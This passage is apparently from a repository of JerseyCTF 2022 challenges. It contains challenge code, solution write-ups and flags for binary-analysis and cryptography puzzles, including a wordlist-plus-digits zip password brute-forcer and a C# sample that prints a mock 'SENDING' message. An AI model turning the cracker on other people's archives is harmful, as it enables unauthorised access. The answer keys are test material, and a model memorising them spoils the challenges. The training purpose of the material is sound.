(gen-key-h s))) 124 | s) 125 | 126 | (defun verify-flag (f) 127 | (cond 128 | ((= (length f) 52) 129 | (let* ((l (map 'list #'char-map f)) 130 | (k (gen-key (loop for i from 1 to 52 collect (* i i)))) 131 | (r (map 'list #'logxor l k)) 132 | (c '(3472 2481 3691 2476 650 3021 260 3972 3888 2025 637 1853 1481 2679 2459 35 706 669 133 | 2794 2383 3041 3855 2203 1178 577 1942 1417 2513 111 1888 3977 933 1399 2705 1902 134 | 3481 3474 3 1349 199 297 1481 3230 1253 3062 1853 246 6 3097 849 4071 2000))) 135 | (cond ((equal r c) "Valid") 136 | (t "Invalid")))) 137 | (t "Invalid"))) 138 | -------------------------------------------------------------------------------- /bin/win-bin-analysis/README.md: -------------------------------------------------------------------------------- 1 | # win-bin-analysis 2 | 3 | # Challenge Text 4 | * Find the key hidden in the Windows executable files. 5 | 6 | # Hint 7 | * .exe's arent the only type of executable file. 8 | * https://www.aesencryptiononline.com/2022/03/aes-encryption-function-ontools.html 9 | 10 | # Solution 11 | 12 | Analyze the .dll (not the .exe) in Ghidra, search for strings, find a bunch of strings that get outputed when the file is executed, get one of the strings, and decrypt using one of the strings as a key and one string saying the encryption algorithm. 13 | 14 | ```````````` 15 | password: HKEY_CURRENT_USER 16 | encryption: AES(CBC) 17 | fakeFlag: njsctf{look-harder} 18 | encrypt: flag-U2FsdGVkX1+/+Gg+TT1OswZb7zJBF954sV9CPYr9yjuECuBh60j/qG3Kw4Hk9/l6fu5ibkYarZWNBByLBuGrYQ== 19 | ```````````` 20 | 21 | * Flag: `jctf{00g@_B000G@@_B1LL_G8S_wAs-H3Re}` 22 | 23 | ## Credit 24 | * Developed by [Christian](https://github.com/Person1080p) 25 | -------------------------------------------------------------------------------- /bin/win-bin-analysis/challenge/winBinAnalysis.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/bin/win-bin-analysis/challenge/winBinAnalysis.zip -------------------------------------------------------------------------------- /bin/win-bin-analysis/src.cs: -------------------------------------------------------------------------------- 1 | using System.Diagnostics; 2 | int coolfunction(string input) 3 | { 4 | Process.Start("cmd.exe", "/K tree"); 5 | string output = "AES(CBC)"; //encyrption for key 6 | return 2345325; 7 | } 8 | 9 | Process.Start("cmd.exe", "/K tree"); 10 | Console.WriteLine($"You really shouldn't run exe's from people that you dont trust {Environment.UserName}"); 11 | Console.WriteLine($"SENDING HKEY_CLASSES_ROOT/.386/PersistentHandler {Environment.NewLine}Date: {DateTime.Now:d} Time: {DateTime.Now:t}"); 12 | coolfunction("sample text"); 13 | var max = 87; 14 | var counter = -42; 15 | string encKey = "HKEY_CURRENT_USER"; //passowrd for key 16 | string words = "njsctf{look-harder}"; 17 | for (int i = 0; i < max; i++) 18 | { 19 | words = words + counter; 20 | counter += 3; 21 | 22 | } 23 | 24 | Console.WriteLine($"{Environment.NewLine} {words} "); 25 | 26 | string realKey = "U2FsdGVkX1+/+Gg+TT1OswZb7zJBF954sV9CPYr9yjuECuBh60j/qG3Kw4Hk9/l6fu5ibkYarZWNBByLBuGrYQ=="; //solution for key encrypted 27 | 28 | Console.ReadLine(); -------------------------------------------------------------------------------- /createWriteup.py: -------------------------------------------------------------------------------- 1 | """ 2 | filename: createWriteup.py 3 | Purpose: (Standardizaiton) To automate the process of creating a write-up 4 | Usage: python3 createWriteup.py 5 | Return(s): 6 | ./ 7 | .//solution 8 | .//README.md 9 | --> # 10 | """ 11 | 12 | import sys 13 | import os 14 | 15 | def usage(): 16 | print(f"Be sure to have your name / handle!") 17 | print(f"Usage:") 18 | print(f"python3 createWriteup.py ") 19 | 20 | 21 | # Quick Function to make a file 22 | makeFile = lambda file: open(file, "x") 23 | 24 | # main -> Returns a standardized process for a single challenge 25 | def main(name_handle): 26 | README = f"{name_handle}/README.md" 27 | 28 | # Creates `./` 29 | os.mkdir(f"{name_handle}") 30 | 31 | # Creates `.//solution` 32 | os.mkdir(f"{name_handle}/solution") 33 | 34 | # Creates `.//README.md` 35 | makeFile(f"{README}") 36 | 37 | with open(f"{README}", "r+") as f: 38 | f.write(f"# {name_handle}'s Write-up for (INSERT CHALLENGE NAME)\n") 39 | 40 | 41 | # Ensures that users are using the program correctly 42 | if __name__ == "__main__": 43 | try: 44 | name_handle = sys.argv[1] 45 | main(name_handle) 46 | except: 47 | usage() 48 | -------------------------------------------------------------------------------- /crypto/README.md: -------------------------------------------------------------------------------- 1 | # Crypto 2 | 3 | ## Easy Challenges 4 | | Challenge Name | Description | Hint 5 | |:-- | :-- | :--- 6 | | [xoracle](xoracle) | Check out my cool new encryption service! It's very secure! Connect to 0.cloud.chals.io on port 19305. | Read carefully: a small mistake or typo can be all it takes to make an encryption system insecure. 7 | | [salad](salad) | Roman generals really knew how to make salad! | Look up some common types of ciphers. 8 | | [new-algorithm](new-algorithm) | On the first day of the job, a new cryptography intern is insisting to upper management that he developed a new encryption algorithm. | What are some differences between encryption, encoding, and hashing? 9 | 10 | ## Medium Challenges 11 | | Challenge Name | Description | Hint 12 | |:-- | :-- | :--- 13 | | [hidden-in-plain-sight](hidden-in-plain-sight) | A file contains the flag but it is encrypted. | The file looks a little longer than you would expect. 14 | | [would-you-wordle](would-you-wordle) | Someone left this secret text string and unfinished Wordle. Can you put them together to get the flag? pUpPHg3KfB15MG2KGtQQMDEECPOF8oa3VA== | Ron's Code 15 | | [secret-message](secret-message) | Could there be a secret message somewhere? | The employees of both organizations passed Decoding 101 in high school, but failed Encryption 101 in college. 16 | 17 | 18 | ## Hard Challenges 19 | | Challenge Name | Description | Hint 20 | |:-- | :-- | :--- 21 | | [file-zip-cracker](file-zip-cracker) | Fix the script to brute force the password. | No hints. 22 | | [audio-transmission](audio-transmission) | We have intercepted an audio transmission from a known criminal organization. | No hints. 23 | | [inDEStructible](inDEStructible) | It's an older code, sir or madam, but it checks out. | No hints. 24 | -------------------------------------------------------------------------------- /crypto/audio-transmission/README.md: -------------------------------------------------------------------------------- 1 | # audio-transmission 2 | 3 | **Challenged by FRSecure** 4 | 5 | ## Challenge Text 6 | * We have intercepted an audio transmission from a known criminal organization. It is obviously encrypted in some way, but we've had no luck deciphering it. Can you help us out? 7 | * https://drive.google.com/drive/folders/1U5n9f1EC7FcTiVzA3mQV7FIuPWEtNK_3?usp=sharing OR https://drive.google.com/drive/folders/1aAu_r12oAOzDMuaJ88tE2fTQ1-wyV1vv?usp=sharing 8 | 9 | ## Hint 10 | * No hints. 11 | 12 | ## Solution 13 | * Taking a look at the spectrogram of the audio file shows several frequency bands clearly defined. The first and last frame are used as a guide to define the 8 frequencies that represent 8 bits of an ascii character. Each 200ms section represents an ascii character. Extracting the entire message from the audio file leaves you with a base64 encoded gif image. 14 | * While this entire challenge could be done manually, it has been purposefully made into a long enough message to be very inefficient. To be completed in a short amount of time, a script should be created to analyze the audio file. 15 | * Flag: `jctf{b1n4Ry_4sc1!_iN_sP3cTr0gr4M}` 16 | 17 | 18 | **Example solution code:** 19 | ``` 20 | import numpy as np 21 | from scipy.fft import * 22 | from scipy.io import wavfile 23 | import base64 24 | 25 | filename = "transmission.wav" 26 | step = 200 27 | 28 | def freq(data, sr, start_time, end_time): 29 | dataToRead = data[int(start_time * sr / 1000) : int(end_time * sr / 1000) + 1] 30 | 31 | N = len(dataToRead) 32 | yf = rfft(dataToRead) 33 | xf = rfftfreq(N, 1 / sr) 34 | 35 | freqs = [290, 250, 210, 170, 130, 90, 50, 10] 36 | f2b = [] 37 | for f in freqs: 38 | f2b += [1] if np.abs(yf[f]) > 1800000 else [0] 39 | 40 | return f2b 41 | 42 | sr, data = wavfile.read(filename) 43 | alen = (len(data)/sr) * 1000 44 | encmsg = '' 45 | 46 | for i in range(0,int(alen),step): 47 | bindata = freq(data, sr, i, i+step) 48 | encmsg += chr(int(''.join([str(c) for c in bindata]),2)) 49 | 50 | decmsg = base64.b64decode(encmsg[2:-2]) 51 | 52 | with open("output.gif", "wb") as f: 53 | f.write(decmsg) 54 | ``` 55 | 56 | 57 | ## Credit 58 | * Developed by [Eric Hanson](https://github.com/vimk1ng) 59 | -------------------------------------------------------------------------------- /crypto/file-zip-cracker/README.md: -------------------------------------------------------------------------------- 1 | # file-zip-cracker 2 | 3 | ## Challenge Text 4 | * We have a secret file that is password protected. However, we have obtained a wordlist of actors that is part of the password. The password is the combination of one of the names on the list with a year. 5 | * Format: "Actor_NameYYYY" 6 | * Example: "Henry_Cavill1964" 7 | * Fix the script to brute force the password. 8 | 9 | ## Hint 10 | * No hints. 11 | 12 | ## Solution 13 | 1. To fix the script: 14 | * Fix Line 23: `numbers_set = '0123456789'` 15 | * Add line 20: `file1 = open('actorList.txt', 'r')` 16 | * Add line 21: `Lines = file1.readlines()` 17 | * Add line 27: `for actor_name in Lines:` 18 | * Change line 30 to: `password = actor_name.strip()+''.join(c)` 19 | 2. After opening the folder there is a txt file that is encoded with ROT13. Use a ROT13 decoder to decode the message to get the code to unlock the next zip file. 20 | 3. After opening the 2nd zip file, the flag is in an mp3 file. But it is not an mp3 file - it is actually a gif file. The file extension has to be renamed to gif to open the file. 21 | 22 | * Flag: `jctf{ew8WhHuhmv}` 23 | 24 | ## Credit 25 | * Developed by [Nishaant Goswamy](https://www.github.com/nishaant215) 26 | -------------------------------------------------------------------------------- /crypto/file-zip-cracker/challenge/FileZipCracker_Challenge_Version.py: -------------------------------------------------------------------------------- 1 | import zipfile 2 | import itertools 3 | from itertools import permutations 4 | 5 | 6 | # Function for extracting zip files to test if the password works! 7 | def extractFile(zip_file, password): 8 | try: 9 | zip_file.extractall(pwd=password.encode()) 10 | return True 11 | except KeyboardInterrupt: 12 | exit(0) 13 | except Exception as e: 14 | pass 15 | 16 | # Main code starts here... 17 | # The file name of the zip file. 18 | zipfilename = 'secret_folder.zip' 19 | 20 | 21 | 22 | 23 | numbers_set = '1235' 24 | 25 | zip_file = zipfile.ZipFile(zipfilename) 26 | 27 | 28 | for c in itertools.product(numbers_set, repeat=4): 29 | # Add the four numbers to the first half of the password. 30 | 31 | password = "Actor_Name"+''.join(c) 32 | # Try to extract the file. 33 | print("Trying: %s" % password) 34 | # If the file was extracted, you found the right password. 35 | if extractFile(zip_file, password): 36 | print('*' * 20) 37 | print('Password found: %s' % password) 38 | print('Files extracted...') 39 | exit(0) 40 | 41 | # If no password was found by the end, let us know! 42 | print('Password not found.') 43 | -------------------------------------------------------------------------------- /crypto/file-zip-cracker/challenge/actorList.txt: -------------------------------------------------------------------------------- 1 | Jensen_Ackles 2 | Johnny_Depp 3 | Andre_3000 4 | Naveen_Andrews 5 | Jensen_Atwood 6 | Tyler_Bachtel 7 | Penn_Badgley 8 | Simon_Baker 9 | Christian_Bale 10 | Eric_Balfour 11 | Eric_Bana 12 | Alex_Band 13 | Antonio_Banderas 14 | Ike_Barinholtz 15 | Ben_Barnes 16 | Eugen_Bauder 17 | William_Beckett 18 | Tyson_Beckford 19 | David_Beckham 20 | Jason_Behr 21 | Jonathan_Bennett 22 | Sam_Bennett 23 | Dierks_Bentley 24 | Gael_Garcia_Bernal 25 | Jon_Bernthal 26 | Wilson_Bethel 27 | Justin_Bieber 28 | David_Blaine 29 | James_Blake 30 | Corbin_Bleu 31 | Orlando_Bloom 32 | Jon_Bon_Jovi 33 | Asher_Book 34 | David_Boreanaz 35 | Tom_Bott 36 | Raoul_Bova 37 | Bow_Wow 38 | Marlon_Brando 39 | Adam_Brody 40 | Chris_Brown 41 | Michel_Brown 42 | Justin_Bruening 43 | Austin_Butler 44 | Gerard_Butler 45 | Santiago_Cabrera 46 | Bobby_Cannavale 47 | Nick_Cannon 48 | Robert_Carmine 49 | Chris_Carmack 50 | Ryan_Carnes 51 | Anthony_Catanzaro 52 | Jim_Caviezel 53 | Henry_Cavill 54 | John_Cena 55 | Justin_Chambers 56 | David_Charvet 57 | Cesar_Chiang 58 | Chingy 59 | Zachary_Chitwood 60 | Hayden_Christensen 61 | Michael_Churchill 62 | Eddie_Cibrian 63 | George_Clooney 64 | Ben_Cohen 65 | Harry_Connick_Jr. 66 | Dane_Cook 67 | Anderson_Cooper 68 | Dominic_Cooper 69 | Michael_Copon 70 | Chris_Cornell 71 | Chace_Crawford 72 | Darren_Criss 73 | Russell_Crowe 74 | Tom_Cruise 75 | Francesco_Cura' 76 | Daddy_Yankee 77 | Matt_Dallas 78 | Matt_Damon 79 | Hugh_Dancy 80 | Marco_Da_Silva 81 | Derrick_Davenport 82 | Eddie_Davenport 83 | Gabe_David 84 | Jeremy_Davison 85 | James_Dean 86 | Benicio_Del_Toro 87 | Patrick_Dempsey 88 | Johnny_Depp 89 | Charles_Dera 90 | Alexandre_Despatie 91 | Aaron_Diaz 92 | Leonardo_Dicaprio 93 | Vin_Diesel 94 | Matt_Dillon 95 | Juan_Dominic 96 | Gary_Dourdan 97 | Drake 98 | Andreas_Drakenberg 99 | Bryce_Draper 100 | George_Dubovoi 101 | Josh_Duhamel 102 | George_Eads 103 | Michael_Ealy 104 | Zac_Efron 105 | Elvis 106 | Eminem 107 | Michael_Erwin 108 | Chris_Evans 109 | Fabolous 110 | Sean_Faris 111 | Evan_Farmer 112 | Colin_Farrell 113 | Oded_Fehr 114 | Tom_Felton 115 | Ralph_Fiennes 116 | Travis_Fimmel 117 | Trent_Ford 118 | Matthew_Fox 119 | Dave_Franco 120 | James_Franco 121 | Drew_Fuller 122 | David_Fumero 123 | Franky_G 124 | Adam_Garcia 125 | Andrew_Garfield 126 | Troy_Garity 127 | Louis_Garrel 128 | Teddy_Geiger 129 | Reynaldo_Gianecchini 130 | Cam_Gigandet 131 | Nicholas_Gonzalez 132 | Rick_Gonzalez 133 | Ryan_Gosling 134 | The_Gotti_Boys 135 | Adrien_Grenier 136 | Ioan_Gruffudd 137 | Jake_Gyllenhaal 138 | Gale_Harold 139 | Josh_Hartnett 140 | Colton_Haynes 141 | Garrett_Hedlund 142 | Josh_Henderson 143 | David_Henrie 144 | Jay_Hernandez 145 | Tyler_Hilton 146 | Emile_Hirsch 147 | Josh_Holloway 148 | Marques_Houston 149 | Kris_Humphries 150 | Charlie_Hunnam 151 | Enrique_Iglesias 152 | Hugh_Jackman 153 | Jonathan_Jackson 154 | Thomas_Jane 155 | Ben_Jelen 156 | Derek_Jeter 157 | Avan_Jogia 158 | Aaron_Johnson 159 | Ben_Patrick_Johnson 160 | Dwayne_"The_Rock"_Johnson 161 | Rusty_Joiner 162 | Joe_Jonas 163 | Kevin_Jonas 164 | Nick_Jonas 165 | Wesley_Jonathan 166 | Steve_Jones 167 | Takeshi_Kaneshiro 168 | Gabe_Kapler 169 | Jordan_Kaye 170 | Gregory_Keith 171 | Toby_Keith 172 | Wiz_Khalifa 173 | Amir_Khan 174 | David_Kimmerle 175 | Taylor_Kitsch 176 | Johnny_Knoxville 177 | Boris_Kodjoe 178 | Lenny_Kravitz 179 | Ashton_Kutcher 180 | Shia_LaBeouf 181 | Nick_Lachey 182 | Caleb_Lane 183 | Taylor_Lautner 184 | Jude_Law 185 | Ryan_LeBar 186 | Samuel_Le_Bihan 187 | Heath_Ledger 188 | Jared_Leto 189 | Adam_Levine 190 | Jason_Lewis 191 | LL_Cool_J 192 | Laurent_Lucas 193 | Diego_Luna 194 | Kellan_Lutz 195 | Tobey_Maguire 196 | Rick_Malambri 197 | Rami_Malek 198 | Forbes_March 199 | Derek_Marrocco 200 | James_Marsden 201 | James_Marsters 202 | Ricky_Martin 203 | Olivier_Martinez 204 | Jesse_McCartney 205 | Matthew_McConaughey 206 | Neil_McDonough 207 | Ewan_McGregor 208 | Joey_McIntyre 209 | Julian_McMahon 210 | Johnny_Messner 211 | Jesse_Metcalfe 212 | Blake_Michael 213 | Frederic_Michalak 214 | Mika 215 | Wentworth_Miller 216 | Sal_Mineo 217 | Jason_Momoa 218 | Christian_Monzon 219 | Shemar_Moore 220 | Carlos_Moore 221 | Matthew_Morrison 222 | Viggo_Mortensen 223 | Dermot_Mulroney 224 | Cillian_Murphy 225 | Chad_Michael_Murray 226 | Nelly 227 | Paul_Newman 228 | Joe_Nichols 229 | Amaury_Nolasco 230 | Dylan_O'Brien 231 | Omarion 232 | Randy_Orton 233 | Clive_Owen 234 | Jared_Padalecki 235 | Hunter_Parrish 236 | Jason_Patric 237 | Marcus_Patrick 238 | Robert_Pattinson 239 | Sean_Paul 240 | Evan_Peters 241 | Alex_Pettyfer 242 | Ryan_Phillippe 243 | Joaquin_Phoenix 244 | River_Phoenix 245 | Chris_Pine 246 | Stefan_Pinto 247 | Romulo_Pires 248 | Brad_Pitt 249 | Michael_Pitt 250 | Raul_Popa 251 | Tyler_Posey 252 | Elvis_Presley 253 | Jason_Priestley 254 | Dominic_Purcell 255 | James_Purefoy 256 | Shawn_Pyfrom 257 | Sendhil_Ramamurthy 258 | Keanu_Reeves 259 | Steve_Reeves 260 | Simon_Rex 261 | Ryan_Reynolds 262 | Jonathan_Rhys-Meyers 263 | Patrick_Ribbsaeter 264 | Thiago_Ribeiro 265 | Caco_Ricci 266 | Tyson_Ritter 267 | Andy_Roddick 268 | Adam_Rodriguez 269 | Cristiano_Ronaldo 270 | Kenzie_Roth 271 | Brandon_Routh 272 | Mark_Ruffalo 273 | Mark_Salling 274 | Steve_Sandvoss 275 | Rodrigo_Santoro 276 | Alejo_Sauras 277 | Joseph_Sayers 278 | Marcus_Schenkenberg 279 | Dayton_Schlosser 280 | Robert_Schwartzman 281 | Seann_William_Scott 282 | Frank_Sepe 283 | David_Shaver 284 | Ryan_Sheckler 285 | Shinya 286 | Clement_Sibony 287 | Will_Smith 288 | Ian_Somerhalder 289 | Trey_Songz 290 | Soulja_Boy 291 | Hal_Sparks 292 | Scott_Speedman 293 | Edward_Speleers 294 | Jason_Statham 295 | Benjamin_Stone 296 | Richie_Stringini 297 | George_Stults 298 | Steven_Strait 299 | Daniel_Sunjata 300 | David_Sutcliffe 301 | Channing_Tatum 302 | T.I. 303 | Lucas_Till 304 | Justin_Timberlake 305 | Adam_Tock 306 | Sonny_Tong 307 | Stuart_Townsend 308 | Tyrese 309 | Gaspard_Ulliel 310 | Karl_Urban 311 | Keith_Urban 312 | Brendon_Urie 313 | Usher 314 | Wilmer_Valderrama 315 | Mark_Valley 316 | Drew_Van_Acker 317 | Jean-Claude_Van_Damme 318 | Mark_Vanderloo 319 | Mario_Vasquez 320 | Milo_Ventimiglia 321 | Eduardo_Verastegui 322 | Rafael_Verga 323 | Jason_Wade 324 | Mark_Wahlberg 325 | Matt_Walch 326 | Paul_Walker 327 | Denzel_Washington 328 | DeAndre_Way 329 | Tom_Welling 330 | Peter_Wentz 331 | Dominic_West 332 | Shane_West 333 | Pharrell_Williams 334 | Robbie_Williams 335 | Bruce_Willis 336 | Andreas_Wilson 337 | Jamie_Wise 338 | Ronnie_Woo 339 | Elijah_Wood 340 | Christian_Yanik 341 | Will_Young 342 | Nick_Youngquest 343 | Billy_Zane 344 | Kevin_Zegers 345 | Rob_Zombie -------------------------------------------------------------------------------- /crypto/file-zip-cracker/challenge/secret_folder.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/crypto/file-zip-cracker/challenge/secret_folder.zip -------------------------------------------------------------------------------- /crypto/file-zip-cracker/solution/FileZipCracker.py: -------------------------------------------------------------------------------- 1 | import zipfile 2 | import itertools 3 | from itertools import permutations 4 | 5 | 6 | # Function for extracting zip files to test if the password works! 7 | def extractFile(zip_file, password): 8 | try: 9 | zip_file.extractall(pwd=password.encode()) 10 | return True 11 | except KeyboardInterrupt: 12 | exit(0) 13 | except Exception as e: 14 | pass 15 | 16 | # Main code starts here... 17 | # The file name of the zip file. 18 | zipfilename = 'secret_folder.zip' 19 | 20 | file1 = open('actorList.txt', 'r') 21 | Lines = file1.readlines() 22 | 23 | numbers_set = '0123456789' 24 | 25 | zip_file = zipfile.ZipFile(zipfilename) 26 | 27 | for actor_name in Lines: 28 | for c in itertools.product(numbers_set, repeat=4): 29 | 30 | password = actor_name.strip()+''.join(c) 31 | # Try to extract the file. 32 | print("Trying: %s" % password) 33 | # If the file was extracted, you found the right password. 34 | if extractFile(zip_file, password): 35 | print('*' * 20) 36 | print('Password found: %s' % password) 37 | print('Files extracted...') 38 | exit(0) 39 | 40 | # If no password was found by the end, let us know! 41 | print('Password not found.') 42 | -------------------------------------------------------------------------------- /crypto/file-zip-cracker/solution/secret_folder.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/crypto/file-zip-cracker/solution/secret_folder.zip -------------------------------------------------------------------------------- /crypto/file-zip-cracker/solution/secret_folder/compressed_file.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/crypto/file-zip-cracker/solution/secret_folder/compressed_file.zip -------------------------------------------------------------------------------- /crypto/file-zip-cracker/solution/secret_folder/compressed_file/Flag.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/crypto/file-zip-cracker/solution/secret_folder/compressed_file/Flag.gif -------------------------------------------------------------------------------- /crypto/file-zip-cracker/solution/secret_folder/msg.txt: -------------------------------------------------------------------------------- 1 | 2 | Encoded Message: 3 | 4 | Gur pbqr gb haybpx gur mvc svyr vf: v'ir_tbg_n_wne_bs_qveg_naq_thrff_jung'f_vafvqr_vg -------------------------------------------------------------------------------- /crypto/hidden-in-plain-sight/README.md: -------------------------------------------------------------------------------- 1 | # hidden-in-plain-sight 2 | 3 | ## Challenge Text 4 | A file contains the flag but it is encrypted. Normally this would be impossible to crack, but you have the encryption algorithm source code in front of you. Try to shift through it and see the vulnerabilities that can get that flag decrypted! 5 | 6 | ## Hint 7 | The file looks a little longer than you would expect. 8 | 9 | ## Solution 10 | * Create a decryptor based around the length of the IV and key which are stored at the end of the encrypted file. 11 | * Flag: `jctf{k3ys_hId3_wh3r3_y0u_l3@sT_3xpeCT_Th3m}` 12 | 13 | ## Credit 14 | * Developed by [Philip C. Okoh](https://github.com/ByridianBlack), part of [RUSEC](https://rusec.github.io/). 15 | -------------------------------------------------------------------------------- /crypto/hidden-in-plain-sight/challenge/encrypted.pco: -------------------------------------------------------------------------------- 1 | nbXg75/acDR47Zgtho29ZVnHqFb7Ikca2SNCWj9SNNe1M+J22JxBrg94feT3anuIx2dQusjf1HJ4fRamU2xGUmHL/Sctgx0ZOsSbIyuksblsjNPmajhzTpljIY0ztR/f6LH5Iq6XJ3MjpTnp4wNg4ODQXfgjyc+UPfk91le4/zIFyAMISCskjw1OYGAOHoS5zTnn5Yv9aHjVIhHX2BetXQ==QE1jUWZUalduWnI0dTd4IUElRCpHLUphTmRSZ1VrWHA= -------------------------------------------------------------------------------- /crypto/hidden-in-plain-sight/challenge/encryption.py: -------------------------------------------------------------------------------- 1 | import base64 2 | import os 3 | from base64 import b64encode 4 | from Cryptodome.Cipher import AES 5 | from Cryptodome.Util.Padding import pad 6 | 7 | key = "" # Don't worry damien. I hid the key. Don't worry about it. This encryption program is secure. 8 | 9 | 10 | 11 | 12 | with open("flag_message_key", 'rb') as NFILE: 13 | malware_code = NFILE.read() 14 | 15 | cryptor = AES.new(key.encode("utf-8"), AES.MODE_CBC) 16 | 17 | encrypted_data = cryptor.encrypt(pad(malware_code, AES.block_size)) 18 | 19 | IV = b64encode(cryptor.iv).decode("utf-8") 20 | 21 | encrypted_data = b64encode(encrypted_data).decode("utf-8") 22 | 23 | encrypted_data += (str(IV)) 24 | RANDOMIZER = 88888888 25 | RANDOMIZER_2 = 4392049302 26 | RANDOMIZER_3 = 93029482930 27 | 28 | 29 | for x in range(1000): 30 | RANDOMIZER_temp = RANDOMIZER_2 ^ RANDOMIZER_3 31 | RANDOMIZER = RANDOMIZER_temp & 1111 32 | RANDOMIZER = RANDOMIZER * 88 33 | 34 | encrypted_data += (b64encode(key.encode("utf-8")).decode()) 35 | encrypted_dta = str(RANDOMIZER) 36 | 37 | print("Key Length: "+str(len(b64encode(key.encode('utf-8')).decode()))) 38 | 39 | print("IV Length: " + str(len(IV))) 40 | 41 | print("KEY: " + str((b64encode(key.encode("utf-8")).decode()))) 42 | 43 | print("IV: " + str(IV)) 44 | 45 | with open("encrypted.pco", 'a') as NFILE: 46 | NFILE.write(encrypted_data) 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | 136 | 137 | 138 | 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | 160 | 161 | 162 | 163 | 164 | 165 | 166 | 167 | 168 | 169 | 170 | 171 | 172 | 173 | 174 | 175 | 176 | 177 | 178 | 179 | 180 | 181 | 182 | 183 | 184 | 185 | 186 | 187 | 188 | 189 | 190 | 191 | 192 | 193 | 194 | 195 | 196 | 197 | 198 | 199 | 200 | 201 | 202 | 203 | 204 | 205 | 206 | 207 | 208 | 209 | 210 | 211 | 212 | 213 | 214 | 215 | 216 | 217 | 218 | 219 | 220 | 221 | 222 | 223 | 224 | 225 | 226 | 227 | 228 | 229 | 230 | 231 | 232 | 233 | 234 | 235 | 236 | 237 | 238 | 239 | 240 | 241 | 242 | 243 | 244 | 245 | 246 | 247 | 248 | 249 | 250 | 251 | 252 | 253 | 254 | 255 | 256 | 257 | 258 | 259 | 260 | 261 | 262 | 263 | 264 | 265 | 266 | 267 | 268 | 269 | 270 | 271 | 272 | 273 | 274 | 275 | 276 | 277 | 278 | 279 | 280 | 281 | # Hey damian slight hicup but I actually don't have the key at hand and I can't just send it to you over the internet 282 | # Anyway just remember that the IV is of length 24 and the key is length 44. Follow the algorithm and you should 283 | # be able to decrypt just about any message. Alright champ? Alright. Good talk. See ya. I hope you get this message. 284 | # I put it down here cause its more secure right? I am just the best BOSS ever. Thank me on Monday. 285 | -------------------------------------------------------------------------------- /crypto/inDEStructible/README.md: -------------------------------------------------------------------------------- 1 | # inDEStructible 2 | 3 | ## Challenge Text 4 | * It's an older code, sir or madam, but it checks out. 5 | 6 | ## Hint 7 | * https://github.com/RobinDavid/pydes 8 | 9 | ## Solution 10 | * Find a DES encryption implementation in your language of choice and start bruteforcing keys (keyspace is 2^56, but the key is going to be < 2^22 so it shouldn't take more than 30 min to bruteforce). 11 | * The exact key was generated by taking the string 'sw' (29559 as an int) and converting it to binary, padded (pre-pending 0s) to 56-bits, and used directly as a key without the permutation. 12 | * Flag: `jctf{p4rty_l1k3_it_1977} ` 13 | 14 | ## Credit 15 | * Developed by [SpadeAsInAce](https://github.com/spade-as-in-ace) 16 | -------------------------------------------------------------------------------- /crypto/inDEStructible/challenge/clearence_code: -------------------------------------------------------------------------------- 1 | )‹™ V÷Ÿ‹ŒB_*Yb7øPåcÙÞÒÖ2 -------------------------------------------------------------------------------- /crypto/new-algorithm/README.md: -------------------------------------------------------------------------------- 1 | # new-algorithm 2 | 3 | ## Challenge Text 4 | * On the first day of the job, a new cryptography intern is insisting to upper management that he developed a new encryption algorithm for the company to use for sensitive emails and should get a raise. This seems too good to be true... are you able to prove the intern wrong by decrypting it? 5 | 6 | * Here's an example of an encrypted email message using the intern's algorithm: 7 | `amN0Znt0UllfQUVTX0lOc1QzQGR9` 8 | 9 | ## Hint 10 | * What are some differences between encryption, encoding, and hashing? 11 | 12 | ## Solution 13 | * Recognize the usage of Base64 encoding and copy the text into a Base64 decoder: 14 | * Flag: `jctf{tRY_AES_INsT3@d}` 15 | 16 | ## Credit 17 | * Developed by [Logan](https://github.com/Git-Logan) 18 | -------------------------------------------------------------------------------- /crypto/salad/README.md: -------------------------------------------------------------------------------- 1 | # salad 2 | 3 | ## Challenge Text 4 | * Roman generals really knew how to make salad! `atkw{plddp_jrcru_uivjjzex}` 5 | 6 | ## Hint 7 | * Look up some common types of ciphers 8 | 9 | ## Solution 10 | * Put it into [dcode.fr's Caesar cipher solver](https://www.dcode.fr/caesar-cipher) and you get the flag. 11 | * Flag: `jctf{yummy_salad_dressing}` 12 | 13 | ## Credit 14 | * Developed by [ContronThePanda](https://github.com/PAndaContron), part of [RUSEC](https://rusec.github.io/). 15 | -------------------------------------------------------------------------------- /crypto/secret-message/README.md: -------------------------------------------------------------------------------- 1 | # secret-message 2 | 3 | ## Challenge Text 4 | * There are two bank heist organizations communicating by sending images of expensive assets to each other, could there be a secret message somewhere? Along with the images, they are sending the same secret_key.txt file with encoded text. 5 | 6 | ## Hint 7 | * The employees of both organizations passed Decoding 101 in high school, but failed Encryption 101 in college. 8 | 9 | ## Solution 10 | * Open the secret_key.txt file - there will be a url encoded string. 11 | * Take the url encoded string and decode it - https://www.urldecoder.org/ 12 | * The decoded url string will output a base64 string, decode it - https://www.base64encode.org/ 13 | * The decoded base64 string will output a Caesar Cipher encrypted string, decrypt it - https://www.dcode.fr/caesar-cipher 14 | * Use the steghide command to unhide the hidden 